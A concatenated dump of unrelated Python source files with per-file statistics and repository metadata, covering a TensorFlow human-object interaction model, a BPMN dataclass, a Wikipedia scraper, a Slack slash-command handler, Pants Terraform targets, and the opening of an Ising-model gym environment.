self.gt_obj_class = tf.cast(tf.matmul(self.gt_class_HO, self.obj_to_HO_matrix, transpose_b=True) > 0,
tf.float32)
self.gt_verb_class = tf.cast(tf.matmul(self.gt_class_HO, self.verb_to_HO_matrix, transpose_b=True) > 0,
tf.float32)
def build_base(self):
with tf.variable_scope(self.scope, self.scope, reuse=tf.AUTO_REUSE,):
net = resnet_utils.conv2d_same(self.image, 64, 7, stride=2, scope='conv1')
net = tf.pad(net, [[0, 0], [1, 1], [1, 1], [0, 0]])
net = slim.max_pool2d(net, [3, 3], stride=2, padding='VALID', scope='pool1')
return net
def image_to_head(self, is_training):
with slim.arg_scope(resnet_arg_scope(is_training=False)):
net = self.build_base()
net, _ = resnet_v1.resnet_v1(net,
self.blocks[0:cfg.RESNET.FIXED_BLOCKS],
global_pool=False,
include_root_block=False,
reuse=tf.AUTO_REUSE,
scope=self.scope)
with slim.arg_scope(resnet_arg_scope(is_training=is_training)):
if self.model_name.__contains__('unique_weights'):
print("unique_weights3")
stop = -3
else:
stop = -2
head, _ = resnet_v1.resnet_v1(net,
self.blocks[cfg.RESNET.FIXED_BLOCKS:stop],
global_pool=False,
include_root_block=False,
reuse=tf.AUTO_REUSE,
scope=self.scope)
return head
def sp_to_head(self):
with tf.variable_scope(self.scope, self.scope, reuse=tf.AUTO_REUSE,):
ends = 2
if self.model_name.__contains__('_spose'):
ends = 3
conv1_sp = slim.conv2d(self.spatial[:,:,:,0:ends], 64, [5, 5], padding='VALID', scope='conv1_sp')
pool1_sp = slim.max_pool2d(conv1_sp, [2, 2], scope='pool1_sp')
conv2_sp = slim.conv2d(pool1_sp, 32, [5, 5], padding='VALID', scope='conv2_sp')
pool2_sp = slim.max_pool2d(conv2_sp, [2, 2], scope='pool2_sp')
pool2_flat_sp = slim.flatten(pool2_sp)
return pool2_flat_sp
def res5(self, pool5_H, pool5_O, sp, is_training, name):
with slim.arg_scope(resnet_arg_scope(is_training=is_training)):
if pool5_H is None:
fc7_H = None
else:
fc7_H, _ = resnet_v1.resnet_v1(pool5_H,
self.blocks[-2:-1],
global_pool=False,
include_root_block=False,
reuse=tf.AUTO_REUSE,
scope=self.scope)
# fc7_H = tf.reduce_mean(fc7_H, axis=[1, 2])
if pool5_O is None:
fc7_O = None
else:
fc7_O, _ = resnet_v1.resnet_v1(pool5_O,
self.blocks[-1:],
global_pool=False,
include_root_block=False,
reuse=tf.AUTO_REUSE,
scope=self.scope)
# fc7_O = tf.reduce_mean(fc7_O, axis=[1, 2])
return fc7_H, fc7_O
def head_to_tail(self, fc7_H, fc7_O, pool5_SH, pool5_SO, sp, is_training, name):
with slim.arg_scope(resnet_arg_scope(is_training=is_training)):
fc7_SH = tf.reduce_mean(pool5_SH, axis=[1, 2])
fc7_SO = tf.reduce_mean(pool5_SO, axis=[1, 2])
Concat_SH = tf.concat([fc7_H, fc7_SH], 1)
fc8_SH = slim.fully_connected(Concat_SH, self.num_fc, scope='fc8_SH', reuse=tf.AUTO_REUSE)
fc8_SH = slim.dropout(fc8_SH, keep_prob=0.5, is_training=is_training, scope='dropout8_SH')
fc9_SH = slim.fully_connected(fc8_SH, self.num_fc, scope='fc9_SH', reuse=tf.AUTO_REUSE)
fc9_SH = slim.dropout(fc9_SH, keep_prob=0.5, is_training=is_training, scope='dropout9_SH')
Concat_SO = tf.concat([fc7_O, fc7_SO], 1)
fc8_SO = slim.fully_connected(Concat_SO, self.num_fc, scope='fc8_SO', reuse=tf.AUTO_REUSE)
fc8_SO = slim.dropout(fc8_SO, keep_prob=0.5, is_training=is_training, scope='dropout8_SO')
fc9_SO = slim.fully_connected(fc8_SO, self.num_fc, scope='fc9_SO', reuse=tf.AUTO_REUSE)
fc9_SO = slim.dropout(fc9_SO, keep_prob=0.5, is_training=is_training, scope='dropout9_SO')
Concat_SHsp = tf.concat([fc7_H, sp], 1)
Concat_SHsp = slim.fully_connected(Concat_SHsp, self.num_fc, scope='Concat_SHsp', reuse=tf.AUTO_REUSE)
Concat_SHsp = slim.dropout(Concat_SHsp, keep_prob=0.5, is_training=is_training, scope='dropout6_SHsp')
fc7_SHsp = slim.fully_connected(Concat_SHsp, self.num_fc, scope='fc7_SHsp', reuse=tf.AUTO_REUSE)
fc7_SHsp = slim.dropout(fc7_SHsp, keep_prob=0.5, is_training=is_training, scope='dropout7_SHsp')
return fc9_SH, fc9_SO, fc7_SHsp
def crop_pool_layer(self, bottom, rois, name):
with tf.variable_scope(name) as scope:
batch_ids = tf.squeeze(tf.slice(rois, [0, 0], [-1, 1], name="batch_id"), [1])
bboxes = self.trans_boxes_by_feats(bottom, rois)
if cfg.RESNET.MAX_POOL:
pre_pool_size = cfg.POOLING_SIZE * 2
crops = tf.image.crop_and_resize(bottom, bboxes, tf.to_int32(batch_ids), [pre_pool_size, pre_pool_size], name="crops")
crops = slim.max_pool2d(crops, [2, 2], padding='SAME')
else:
crops = tf.image.crop_and_resize(bottom, bboxes, tf.to_int32(batch_ids), [cfg.POOLING_SIZE, cfg.POOLING_SIZE], name="crops")
return crops
def trans_boxes_by_feats(self, bottom, rois):
bottom_shape = tf.shape(bottom)
height = (tf.to_float(bottom_shape[1]) - 1.) * np.float32(self.stride[0])
width = (tf.to_float(bottom_shape[2]) - 1.) * np.float32(self.stride[0])
x1 = tf.slice(rois, [0, 1], [-1, 1], name="x1") / width
y1 = tf.slice(rois, [0, 2], [-1, 1], name="y1") / height
x2 = tf.slice(rois, [0, 3], [-1, 1], name="x2") / width
y2 = tf.slice(rois, [0, 4], [-1, 1], name="y2") / height
bboxes = tf.stop_gradient(tf.concat([y1, x1, y2, x2], axis=1))
return bboxes
def attention_pool_layer_H(self, bottom, fc7_H, is_training, name):
with tf.variable_scope(name) as scope:
fc1 = slim.fully_connected(fc7_H, 512, scope='fc1_b')
fc1 = slim.dropout(fc1, keep_prob=0.8, is_training=is_training, scope='dropout1_b')
fc1 = tf.reshape(fc1, [tf.shape(fc1)[0], 1, 1, tf.shape(fc1)[1]])
att = tf.reduce_mean(tf.multiply(bottom, fc1), 3, keep_dims=True)
return att
def attention_norm_H(self, att, name):
with tf.variable_scope(name) as scope:
att = tf.transpose(att, [0, 3, 1, 2])
att_shape = tf.shape(att)
att = tf.reshape(att, [att_shape[0], att_shape[1], -1])
att = tf.nn.softmax(att)
att = tf.reshape(att, att_shape)
att = tf.transpose(att, [0, 2, 3, 1])
return att
def attention_pool_layer_O(self, bottom, fc7_O, is_training, name):
with tf.variable_scope(name) as scope:
fc1 = slim.fully_connected(fc7_O, 512, scope='fc1_b')
fc1 = slim.dropout(fc1, keep_prob=0.8, is_training=is_training, scope='dropout1_b')
fc1 = tf.reshape(fc1, [tf.shape(fc1)[0], 1, 1, tf.shape(fc1)[1]])
att = tf.reduce_mean(tf.multiply(bottom, fc1), 3, keep_dims=True)
return att
def attention_norm_O(self, att, name):
with tf.variable_scope(name) as scope:
att = tf.transpose(att, [0, 3, 1, 2])
att_shape = tf.shape(att)
att = tf.reshape(att, [att_shape[0], att_shape[1], -1])
att = tf.nn.softmax(att)
att = tf.reshape(att, att_shape)
att = tf.transpose(att, [0, 2, 3, 1])
return att
def region_classification(self, fc7_H, fc7_O, fc7_SHsp, is_training, initializer, name):
with tf.variable_scope(name) as scope:
cls_score_H = slim.fully_connected(fc7_H, self.num_classes,
weights_initializer=initializer,
trainable=is_training,
activation_fn=None, scope='cls_score_H')
cls_prob_H = tf.nn.sigmoid(cls_score_H, name='cls_prob_H')
tf.reshape(cls_prob_H, [-1, self.num_classes])
cls_score_O = slim.fully_connected(fc7_O, self.num_classes,
weights_initializer=initializer,
trainable=is_training,
activation_fn=None, scope='cls_score_O')
cls_prob_O = tf.nn.sigmoid(cls_score_O, name='cls_prob_O')
tf.reshape(cls_prob_O, [-1, self.num_classes])
cls_score_sp = slim.fully_connected(fc7_SHsp, self.num_classes,
weights_initializer=initializer,
trainable=is_training,
activation_fn=None, scope='cls_score_sp')
cls_prob_sp = tf.nn.sigmoid(cls_score_sp, name='cls_prob_sp')
tf.reshape(cls_prob_sp, [-1, self.num_classes])
self.predictions["cls_score_H"] = cls_score_H
self.predictions["cls_prob_H"] = cls_prob_H
self.predictions["cls_score_O"] = cls_score_O
self.predictions["cls_prob_O"] = cls_prob_O
self.predictions["cls_score_sp"] = cls_score_sp
self.predictions["cls_prob_sp"] = cls_prob_sp
self.predictions["cls_prob_HO"] = cls_prob_sp * (cls_prob_O + cls_prob_H)
return cls_prob_H, cls_prob_O, cls_prob_sp
def bottleneck(self, bottom, is_training, name, reuse=False):
with tf.variable_scope(name) as scope:
if reuse:
scope.reuse_variables()
head_bottleneck = slim.conv2d(bottom, 1024, [1, 1], scope=name)
return head_bottleneck
def build_network(self, is_training):
initializer = tf.random_normal_initializer(mean=0.0, stddev=0.01)
# ResNet Backbone
head = self.image_to_head(is_training)
sp = self.sp_to_head()
pool5_H = self.crop_pool_layer(head, self.H_boxes, 'Crop_H')
pool5_O = self.crop_pool_layer(head, self.O_boxes[:self.H_num,:], 'Crop_O')
fc7_H, fc7_O = self.res5(pool5_H, pool5_O, sp, is_training, 'res5')
fc7_H = tf.reduce_mean(fc7_H, axis=[1, 2])
fc7_O = tf.reduce_mean(fc7_O, axis=[1, 2])
# Phi
head_phi = slim.conv2d(head, 512, [1, 1], scope='head_phi')
# g
head_g = slim.conv2d(head, 512, [1, 1], scope='head_g')
Att_H = self.attention_pool_layer_H(head_phi, fc7_H, is_training, 'Att_H')
Att_H = self.attention_norm_H(Att_H, 'Norm_Att_H')
att_head_H = tf.multiply(head_g, Att_H)
Att_O = self.attention_pool_layer_O(head_phi, fc7_O, is_training, 'Att_O')
Att_O = self.attention_norm_O(Att_O, 'Norm_Att_O')
att_head_O = tf.multiply(head_g, Att_O)
pool5_SH = self.bottleneck(att_head_H, is_training, 'bottleneck', False)
pool5_SO = self.bottleneck(att_head_O, is_training, 'bottleneck', True)
# fc7_O = tf.Print(fc7_O, [tf.shape(fc7_O), tf.shape(fc7_H)], message='check fc7_O:')
fc7_SH, fc7_SO, fc7_SHsp = self.head_to_tail(fc7_H, fc7_O, pool5_SH, pool5_SO, sp, is_training, 'fc_HO')
# fc7_SO = tf.Print(fc7_SO, [tf.shape(fc7_SO), tf.shape(fc7_SH), tf.shape(fc7_SHsp)], message='check fc7_SHsp:')
cls_prob_H, cls_prob_O, cls_prob_sp = self.region_classification(fc7_SH, fc7_SO, fc7_SHsp, is_training, initializer, 'classification')
self.score_summaries.update(self.predictions)
self.visualize["attention_map_H"] = (Att_H - tf.reduce_min(Att_H[0,:,:,:])) / tf.reduce_max((Att_H[0,:,:,:] - tf.reduce_min(Att_H[0,:,:,:])))
self.visualize["attention_map_O"] = (Att_O - tf.reduce_min(Att_O[0,:,:,:])) / tf.reduce_max((Att_O[0,:,:,:] - tf.reduce_min(Att_O[0,:,:,:])))
return cls_prob_H, cls_prob_O, cls_prob_sp
def create_architecture(self, is_training):
self.build_network(is_training)
# for var in tf.trainable_variables():
# self.train_summaries.append(var)
if is_training: self.add_loss()
layers_to_output = {}
layers_to_output.update(self.losses)
val_summaries = []
if is_training:
with tf.device("/cpu:0"):
# val_summaries.append(self.add_gt_image_summary_H())
# val_summaries.append(self.add_gt_image_summary_HO())
# tf.summary.image('ATTENTION_MAP_H', self.visualize["attention_map_H"], max_outputs=1)
# tf.summary.image('ATTENTION_MAP_O', self.visualize["attention_map_O"], max_outputs=1)
for key, var in self.visualize.items():
tf.summary.image(key, var, max_outputs=1)
for key, var in self.event_summaries.items():
val_summaries.append(tf.summary.scalar(key, var))
# val_summaries.append(tf.summary.scalar('lr', self.lr))
self.summary_op = tf.summary.merge_all()
self.summary_op_val = tf.summary.merge(val_summaries)
return layers_to_output
def add_loss(self):
with tf.variable_scope('LOSS') as scope:
cls_score_H = self.predictions["cls_score_H"]
cls_score_O = self.predictions["cls_score_O"]
cls_score_sp = self.predictions["cls_score_sp"]
label_HO = self.gt_class_HO
H_cross_entropy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = label_HO[:self.H_num,:], logits = cls_score_H[:self.H_num,:]))
O_cross_entropy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = label_HO[:self.H_num,:], logits = cls_score_O[:self.H_num,:]))
sp_cross_entropy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = label_HO, logits = cls_score_sp))
self.losses['H_cross_entropy'] = H_cross_entropy
self.losses['O_cross_entropy'] = O_cross_entropy
self.losses['sp_cross_entropy'] = sp_cross_entropy
loss = H_cross_entropy + O_cross_entropy + sp_cross_entropy
self.losses['total_loss'] = loss
self.event_summaries.update(self.losses)
return loss
def add_gt_image_summary_H(self):
image = tf.py_func(draw_bounding_boxes_HOI,
[tf.reverse(self.image+cfg.PIXEL_MEANS, axis=[-1]), self.H_boxes, self.gt_class_HO],
tf.float32, name="gt_boxes_H")
return tf.summary.image('GROUND_TRUTH_H', image)
def add_gt_image_summary_HO(self):
image = tf.py_func(draw_bounding_boxes_HOI,
[tf.reverse(self.image+cfg.PIXEL_MEANS, axis=[-1]), self.O_boxes, self.gt_class_HO],
tf.float32, name="gt_boxes_HO")
return tf.summary.image('GROUND_TRUTH_HO)', image)
def add_score_summary(self, key, tensor):
if tensor is not None and tensor.op is not None:
tf.summary.histogram('SCORE/' + tensor.op.name + '/' + key + '/scores', tensor)
def add_train_summary(self, var):
tf.summary.histogram('TRAIN/' + var.op.name, var)
def get_feed_dict(self, blobs):
feed_dict = {self.image: blobs['image'], self.H_boxes: blobs['H_boxes'],
self.O_boxes: blobs['O_boxes'], self.gt_class_HO: blobs['gt_class_HO'],
self.spatial: blobs['sp'],
# self.lr: lr,
self.H_num: blobs['H_num']}
return feed_dict
def train_step(self, sess, blobs, lr, train_op):
feed_dict = self.get_feed_dict(blobs)
loss, _ = sess.run([self.losses['total_loss'],
train_op],
feed_dict=feed_dict)
return loss
def train_step_with_summary(self, sess, blobs, lr, train_op):
feed_dict = self.get_feed_dict(blobs)
loss, summary, _ = sess.run([self.losses['total_loss'],
self.summary_op,
train_op],
feed_dict=feed_dict)
return loss, summary
def train_step_tfr(self, sess, blobs, lr, train_op):
loss, image_id, _ = sess.run([self.losses['total_loss'], self.image_id,
train_op])
return loss, image_id
def train_step_tfr_with_summary(self, sess, blobs, lr, train_op):
loss, summary, image_id, _ = sess.run([self.losses['total_loss'],
self.summary_op, self.image_id,
train_op])
return loss, image_id, summary
def test_image_HO(self, sess, image, blobs):
feed_dict = {self.image: image, self.H_boxes: blobs['H_boxes'], self.O_boxes: blobs['O_boxes'], self.spatial: blobs['sp'], self.H_num: blobs['H_num']}
cls_prob_HO = sess.run([self.predictions["cls_prob_HO"]], feed_dict=feed_dict)
return cls_prob_HO
def obtain_all_preds(self, sess, image, blobs):
feed_dict = {self.image: image, self.H_boxes: blobs['H_boxes'], self.O_boxes: blobs['O_boxes'],
self.spatial: blobs['sp'], self.H_num: blobs['H_num']}
cls_prob_HO, pH, pO, pSp = sess.run([self.predictions["cls_prob_HO"], self.predictions["cls_prob_H"],
self.predictions["cls_prob_O"], self.predictions["cls_prob_sp"]], feed_dict=feed_dict)
return cls_prob_HO, pH, pO, pSp, pSp
def obtain_all_preds_tfr(self, sess):
cls_prob_HO, pH, pO, pSp = sess.run([self.predictions["cls_prob_HO"], self.predictions["cls_prob_H"],
self.predictions["cls_prob_O"], self.predictions["cls_prob_sp"]])
return cls_prob_HO, pH, pO, pSp, pSp | 52.949757 | 158 | 0.589654 | 4,596 | 32,670 | 3.959312 | 0.147955 | 0.026928 | 0.018794 | 0.015717 | 0.432269 | 0.356158 | 0.320218 | 0.292081 | 0.262131 | 0.238116 | 0 | 0.215662 | 0.283532 | 32,670 | 617 | 159 | 52.949757 | 0.561755 | 0.031742 | 0 | 0.219462 | 0 | 0 | 0.037002 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068323 | false | 0.00207 | 0.031056 | 0 | 0.15735 | 0.006211 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
621e26224a5b7df57e76176ccf102f633408ef39 | 290 | py | Python | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from .t_catch_event import TCatchEvent
__NAMESPACE__ = "http://www.omg.org/spec/BPMN/20100524/MODEL"
@dataclass
class CatchEvent(TCatchEvent):
class Meta:
name = "catchEvent"
namespace = "http://www.omg.org/spec/BPMN/20100524/MODEL"
| 24.166667 | 65 | 0.731034 | 36 | 290 | 5.722222 | 0.583333 | 0.126214 | 0.15534 | 0.184466 | 0.417476 | 0.417476 | 0.417476 | 0.417476 | 0.417476 | 0 | 0 | 0.065306 | 0.155172 | 290 | 11 | 66 | 26.363636 | 0.77551 | 0 | 0 | 0 | 0 | 0 | 0.331034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
622719ea6c5735ec54aa9dbdf7b5a6d8d0c52ce7 | 1,115 | py | Python | hard-gists/1191457/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 21 | 2019-07-08T08:26:45.000Z | 2022-01-24T23:53:25.000Z | hard-gists/1191457/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 5 | 2019-06-15T14:47:47.000Z | 2022-02-26T05:02:56.000Z | hard-gists/1191457/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 17 | 2019-05-16T03:50:34.000Z | 2021-01-14T14:35:12.000Z | #!/usr/bin/env python
import urllib
import sys
import json
from mwlib import parser
from mwlib.refine import compat
if __name__ == "__main__":
params = urllib.urlencode({
"format": "json",
"action": "query",
"prop": "revisions",
"rvprop": "content",
"titles": "ISO_3166-1",
"rvsection": "4",
})
wc = urllib.urlopen("http://en.wikipedia.org/w/api.php?%s" % params)
if wc.getcode() != 200:
print "Fail!"
sys.exit(2)
raw = wc.read()
rdata = json.loads(raw)
wc.close()
page = rdata['query']['pages'].itervalues().next()
if not page:
print "NO page found"
sys.exit(3)
revision = page['revisions'][0]
if not revision:
print "NO revision found"
sys.exit(4)
content = revision[str(revision.keys()[0])]
parsed = compat.parse_txt(content)
table = parsed.find(parser.Table)[0]
if not table:
print "Table not found"
sys.exit(5)
for row in table.children:
cells = row.find(parser.Cell)
print cells[0].asText().replace("}}", "").replace("{{", "").strip() + \
" || " + cells[1].asText().strip() + " || " + cells[2].asText().strip() \
+ " || " + cells[3].asText().strip()
| 22.755102 | 75 | 0.625112 | 155 | 1,115 | 4.432258 | 0.509677 | 0.040757 | 0.052402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021482 | 0.165022 | 1,115 | 48 | 76 | 23.229167 | 0.716434 | 0.017937 | 0 | 0 | 0 | 0 | 0.184644 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.125 | null | null | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6228f1664df5b9ec6866831755970b61d71b6d58 | 3,058 | py | Python | ECC_main/platform/slack.py | dongh9508/ECC-main | 904110b70ba3e459d92c6d21a5ad1693b4ee726a | [
"MIT"
] | 2 | 2019-01-23T00:04:18.000Z | 2019-02-01T10:09:15.000Z | ECC_main/platform/slack.py | dongh9508/ECC-main | 904110b70ba3e459d92c6d21a5ad1693b4ee726a | [
"MIT"
] | 26 | 2018-07-11T07:59:46.000Z | 2021-02-08T20:21:46.000Z | ECC_main/platform/slack.py | dongh9508/ECC-main | 904110b70ba3e459d92c6d21a5ad1693b4ee726a | [
"MIT"
] | 2 | 2018-08-31T14:08:19.000Z | 2018-08-31T15:14:29.000Z | from .platformBase import PlatformBase
from django.http import HttpResponse, JsonResponse
from ECC_main.baseRequest import BaseRequest
import ECC_main.settings
import threading
import requests
class Slack(PlatformBase):
def slash_command(request, func):
token = request.POST['token']
if ECC_main.settings.SLACK_VERIFICATION_TOKEN == token:
print("authenticated!")
json_body = Slack._get_json_list(request)
slash_response = Slack._func_start(json_body, func)
if slash_response.lazy_slash_response is not None:
Slack.lazy_slash_command(json_body, slash_response)
if slash_response.response_type is None:
slash_response['response_type'] = 'ephemeral'
if slash_response.status != 200 or slash_response.text == "":
json_response = JsonResponse(slash_response, status=slash_response.status)
else:
json_response = JsonResponse(slash_response)
return json_response
else:
print("unauthenticated")
return HttpResponse(status=403)
def lazy_slash_command(json_body, slash_response):
func, args, kwargs, request_result_func = slash_response.lazy_slash_response.get_lazy()
def async_func(*_args, **_kwargs):
print('lazy send func start')
slash_response = func(*_args, **_kwargs)
chat_id = Slack._get_chat_id(json_body)
response_url = Slack._get_response_url(json_body)
if slash_response.response_type is None:
slash_response['response_type'] = 'in_channel'
response = Slack._send_message(slash_response, response_url)
if request_result_func is not None:
request_result_func(response)
threading.Thread(target=async_func, args=args, kwargs=kwargs).start()
def platform():
return 'slack'
def _get_chat_id(json_body):# return channel_id
return json_body['channel_id']
def _get_user_id(json_body):
return json_body['user_id']
def _get_user_name(json_body):
return json_body['user_name']
def _get_json_list(request_body):
return request_body.POST
def _get_response_url(json_body):
return json_body['response_url']
def _func_start(json_body, func):
platform = Slack.platform()
text = Slack._get_text(json_body)
user_name = Slack._get_user_name(json_body)
user_id = Slack._get_user_id(json_body)
baseRequest = BaseRequest(platform, text, user_name, user_id)
return func(baseRequest)
def _get_text(json_body):
return json_body['text']
def _send_message(slash_response, response_url):
return requests.post(response_url, json=slash_response) | 35.149425 | 95 | 0.624591 | 345 | 3,058 | 5.156522 | 0.17971 | 0.089938 | 0.070826 | 0.056211 | 0.392917 | 0.175379 | 0.106802 | 0.065205 | 0.065205 | 0.065205 | 0 | 0.002808 | 0.301177 | 3,058 | 87 | 96 | 35.149425 | 0.829668 | 0.005559 | 0 | 0.065574 | 0 | 0 | 0.048026 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.196721 | false | 0 | 0.098361 | 0.131148 | 0.491803 | 0.04918 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
6232c87d0d4107ba98750270bdd408dd5d0b9dfa | 1,389 | py | Python | src/python/pants/backend/terraform/target_types.py | danxmoran/pants | 7fafd7d789747c9e6a266847a0ccce92c3fa0754 | [
"Apache-2.0"
] | null | null | null | src/python/pants/backend/terraform/target_types.py | danxmoran/pants | 7fafd7d789747c9e6a266847a0ccce92c3fa0754 | [
"Apache-2.0"
] | 22 | 2022-01-27T09:59:50.000Z | 2022-03-30T07:06:49.000Z | src/python/pants/backend/terraform/target_types.py | danxmoran/pants | 7fafd7d789747c9e6a266847a0ccce92c3fa0754 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from pants.engine.rules import collect_rules
from pants.engine.target import (
COMMON_TARGET_FIELDS,
Dependencies,
FieldSet,
MultipleSourcesField,
Target,
generate_multiple_sources_field_help_message,
)
from pants.util.strutil import softwrap
class TerraformModuleSourcesField(MultipleSourcesField):
default = ("*.tf",)
expected_file_extensions = (".tf",)
ban_subdirectories = True
help = generate_multiple_sources_field_help_message(
"Example: `sources=['example.tf', 'new_*.tf', '!old_ignore.tf']`"
)
@dataclass(frozen=True)
class TerraformFieldSet(FieldSet):
required_fields = (TerraformModuleSourcesField,)
sources: TerraformModuleSourcesField
class TerraformModuleTarget(Target):
alias = "terraform_module"
core_fields = (*COMMON_TARGET_FIELDS, Dependencies, TerraformModuleSourcesField)
help = softwrap(
"""
A single Terraform module corresponding to a directory.
There must only be one `terraform_module` in a directory.
Use `terraform_modules` to generate `terraform_module` targets for less boilerplate.
"""
)
def rules():
return collect_rules()
| 26.711538 | 92 | 0.735781 | 145 | 1,389 | 6.834483 | 0.551724 | 0.060545 | 0.030272 | 0.060545 | 0.078708 | 0.078708 | 0 | 0 | 0 | 0 | 0 | 0.005277 | 0.181425 | 1,389 | 51 | 93 | 27.235294 | 0.866315 | 0.090713 | 0 | 0 | 0 | 0 | 0.084314 | 0.022549 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.166667 | 0.033333 | 0.633333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6236a853e217ec41f065c4c8899eb05e1e528ac1 | 21,375 | py | Python | ToricLearning/ising.py | danielfreeman11/thermal-toric-code | 3718f1b16737dfae09443466f6cfb65036faaa89 | [
"MIT"
] | 6 | 2017-11-15T00:54:13.000Z | 2021-11-21T02:08:21.000Z | ToricLearning/ising.py | danielfreeman11/thermal-toric-code | 3718f1b16737dfae09443466f6cfb65036faaa89 | [
"MIT"
] | null | null | null | ToricLearning/ising.py | danielfreeman11/thermal-toric-code | 3718f1b16737dfae09443466f6cfb65036faaa89 | [
"MIT"
] | null | null | null | """
Ising model one-shot dynamics simulation.
From C. Daniel Freeman (2016 http://arxiv.org/abs/1603.05005)
"""
import logging
import math
import gym
from gym import spaces
from gym.utils import seeding
import numpy as np
#import isingutils.py
import random
from random import choice
import copy
import sys
from compiler.ast import flatten
from numpy import *
logger = logging.getLogger(__name__)
class IsingEnv(gym.Env):
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second' : 50
}
def __init__(self):
#Holds transform objects for rendering
self.translist = []
self.error_translist = []
self.TotalTime = 0.
#self.NextActionTime = 0.
#self.NextActionProbability = 0.
self.SystemLength = 24
self.Temperature = .15
self.Delta = 1.0
self.CreationRate = abs(1./(1-np.exp(self.Delta*1.0/self.Temperature)))
self.AnnihilationRate = abs(1./(1-np.exp(-self.Delta*1.0/self.Temperature)))
self.HoppingRate = .01#self.Temperature
self.CorrectionRate = 1.
self.Sector = 0
self.state = np.zeros(self.SystemLength)
self.error_state = np.zeros(self.SystemLength)
# Angle limit set to 2 * theta_threshold_radians so failing observation is still within bounds
low = np.zeros(self.SystemLength)
high = np.ones(self.SystemLength)
# Can perform a swap between any pair of sites. Convention is that 0 swaps from 0 to 1 and (SystemLength-1) swaps from (SystemLength-1) to 0.
# i.e., periodic boundary conditions.
self.action_space = spaces.Discrete(self.SystemLength)
self.observation_space = spaces.Box(low, high)
self._seed()
self.reset()
self.viewer = None
anyons_list = self.state
self.steps_beyond_done = 0.
#Need to calculate when the first bath interaction will occur
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(anyons_list)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate + len(ExPairLocList)*self.AnnihilationRate + \
(len(EmptyPairLocList))*self.CreationRate
self.PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate/Norm
self.PAnn = len(ExPairLocList)*self.AnnihilationRate/Norm
self.PCre = (len(anyons_list) - len(ExPairLocList) - (len(RightHoppableLocList)+len(LeftHoppableLocList)))*self.HoppingRate/Norm
self.NextActionProbability = random.random()
self.NextActionTime = self.TotalTime + (-1./Norm)*np.log(self.NextActionProbability)
# Just need to initialize the relevant attributes
self._configure()
def _configure(self, display=None):
self.display = display
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _step(self, action):
assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action))
print "Current time: " + str(self.TotalTime)
print "Next action: " + str(self.NextActionTime)
state = self.state
anyons_list = state
#Store the winding operator before we do anything to the chain
p = int(floor(len(self.state)/2.))
pl,pr = self.state[p],self.state[p+1]
#I'm going to change this into a more discrete picture--where there's an integer system clock,
#and dynamics occur inbetween clock calls.
#The most obvious way to do this is to stick a while loop in the if statement below that performs dynamics until
#the next action time is after the next cycle of (CorrectionPeriod) * (n + 1) (if this were occuring between n and n+1)
#if the next corrective action would occur after the next bath interaction, do the bath interaction and calculate the next bath interaction time
